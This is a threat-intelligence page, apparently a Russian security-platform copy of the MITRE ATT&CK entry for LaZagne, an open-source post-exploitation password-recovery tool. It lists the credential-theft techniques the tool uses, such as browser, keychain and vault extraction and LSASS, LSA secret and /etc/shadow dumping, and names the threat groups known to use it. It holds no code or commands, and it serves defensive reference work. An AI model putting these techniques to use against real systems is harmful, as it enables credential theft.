Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

LaZagne

LaZagne is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. LaZagne is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)
ID: S0349
Type: TOOL
Platforms: Windows
Version: 1.6
Created: 30 Jan 2019
Last Modified: 04 Apr 2024

Techniques Used

Domain ID Name Use
Enterprise T1555 .001 Credentials from Password Stores: Keychain

LaZagne can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)

.003 Credentials from Password Stores: Credentials from Web Browsers

LaZagne can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)

.004 Credentials from Password Stores: Windows Credential Manager

LaZagne can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

LaZagne can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

.004 OS Credential Dumping: LSA Secrets

LaZagne can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

.005 OS Credential Dumping: Cached Domain Credentials

LaZagne can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)

.007 OS Credential Dumping: Proc Filesystem

LaZagne can use the `/maps` and `/mem` files to identify regex patterns to dump cleartext passwords from the browser's process memory.(Citation: GitHub LaZagne Dec 2018)(Citation: Picus Labs Proc cump 2022)

.008 OS Credential Dumping: /etc/passwd and /etc/shadow

LaZagne can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)

Enterprise T1552 .001 Unsecured Credentials: Credentials In Files

LaZagne can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)

Groups That Use This Software

ID Name References
G0077 Leafminer

(Citation: Symantec Leafminer July 2018)

G0102 Wizard Spider

(Citation: Mandiant FIN12 Oct 2021)

G0022 APT3

(Citation: Symantec Buckeye)

G1015 Scattered Spider

(Citation: MSTIC Octo Tempest Operations October 2023)

G0049 OilRig

(Citation: FireEye APT35 2018)

G0069 MuddyWater

(Citation: Symantec MuddyWater Dec 2018) (Citation: TrendMicro POWERSTATS V3 June 2019)

G0100 Inception

(Citation: Kaspersky Cloud Atlas August 2019)

G0064 APT33

(Citation: Symantec Elfin Mar 2019)

G0139 TeamTNT

(Citation: ATT TeamTNT Chimaera September 2020)

G0131 Tonto Team

(Citation: TrendMicro Tonto Team October 2020)

G0120 Evilnum

(Citation: ESET EvilNum July 2020)

G1024 Akira

(Citation: Arctic Wolf Akira 2023)

References

  1. Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.
  2. Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.
  3. Symantec Security Response. (2018, July 25). Leafminer: New Espionage Campaigns Targeting Middle Eastern Regions. Retrieved August 28, 2018.
  4. Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
  5. Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
  6. Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
  7. Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.
  8. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
  9. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  10. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  11. Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.
  12. AT&T Alien Labs. (2021, September 8). TeamTNT with new campaign aka Chimaera. Retrieved September 22, 2021.
  13. Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021.
  14. Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.
  15. Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.
  16. Steven Campbell, Akshay Suthar, & Connor Belfiorre. (2023, July 26). Conti and Akira: Chained Together. Retrieved February 20, 2024.

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.